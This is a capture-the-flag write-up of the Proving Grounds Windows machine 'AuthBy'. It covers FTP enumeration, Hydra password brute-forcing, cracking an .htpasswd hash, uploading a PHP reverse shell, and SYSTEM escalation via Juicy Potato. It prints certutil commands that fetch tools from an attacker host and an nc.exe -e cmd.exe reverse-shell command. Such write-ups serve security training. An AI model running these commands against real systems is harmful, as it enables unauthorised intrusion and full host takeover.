AuthBy
Source: Proving Grounds
OS: Windows
Community Rating: Hard
Enumeration & Reconnaissance
I started with the usual AutoRecon scan, which revealed the following open ports:
FTP (21)
HTTP (242)
3145
RDP (3389)
FTP allowed anonymous login, so I began there. Although the anonymous account could only list directories, not download files, I noticed an "accounts" folder whose entries were usernames:
offsec
admin
anonymous

The HTTP service, however, required credentials to proceed.
Gaining Initial Access
I used Hydra with the -e nsr flag (try a null password, the username itself, and the username reversed) to brute-force the accounts. The admin account worked with the password "admin". Those admin credentials did not work on the HTTP site, but they did grant download access on FTP, so I mirrored the whole share with:
wget -r ftp://admin:admin@192.168.118.46

After some digging and going in circles, I found a hidden file I had not noticed at first, .htpasswd, which contained a password hash for offsec. Running John the Ripper against it cracked the hash; the password was "elite".



Now with offsec's credentials, I logged into the HTTP server and noticed that the index.html there was identical to the one on the FTP server. That meant the FTP root and the web root were the same directory, so I could upload a shell via FTP (using the admin account) and then trigger it over HTTP with the offsec account. I first tried pentestmonkey's PHP reverse shell, which would connect briefly and then crash; I switched to Ivan Sincek's PHP reverse shell, and it worked. I was in.


Privilege Escalation
Running whoami /priv revealed that I had SeImpersonatePrivilege. I checked systeminfo to determine whether the server was 64-bit or 32-bit and then downloaded several PoCs. None worked until I resorted to Juicy Potato. I used certutil to download the necessary files:
certutil -urlcache -split -f http://192.168.45.231:901/Juicy.Potato.x86.exe
certutil -urlcache -split -f http://192.168.45.231:901/nc.exe
After uploading both nc and Juicy Potato, I tried running Juicy Potato with the default CLSID. It did not work at first, because the CLSID has to match the target's Windows version, so I tested different ones until one succeeded. In the command below, -t * tells Juicy Potato to try both CreateProcessWithTokenW and CreateProcessAsUser, -l 1337 is the local port its COM server listens on, and -p/-a run the payload:
.\Juicy.Potato.x86.exe -t * -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\wamp\bin\apache\Apache2.2.21\nc.exe -e cmd.exe 192.168.45.231 5555" -c {e60687f7-01a1-40aa-86ac-db1cbf673334}


Lessons Learned
FTP Enumeration: Even with anonymous login, checking directories (like "accounts") can reveal valid usernames.
Brute Force is Key: Using Hydra with the proper flags (here -e nsr) can uncover weak credentials quickly.
Hidden Files Matter: Don't overlook hidden files on FTP servers; .htpasswd provided the offsec password here.
File Transfer Tools: Using wget -r to mirror all FTP files can save a lot of time.
Shell Stability: If one PHP shell doesn't work (like pentestmonkey's), try alternatives until you get a stable connection.
Windows Nuances: Remember that on Windows, commands in the current directory are executed with .\ rather than ./, and rlwrap can improve shell usability with nc.
Certutil for File Transfers: certutil -urlcache -split -f is a useful way to pull files onto a Windows host, as demonstrated when downloading Juicy Potato and nc.
Privilege Escalation with Juicy Potato: Abusing SeImpersonatePrivilege through Juicy Potato is a common route from a service account to SYSTEM on Windows; pick a CLSID that matches the target's Windows version.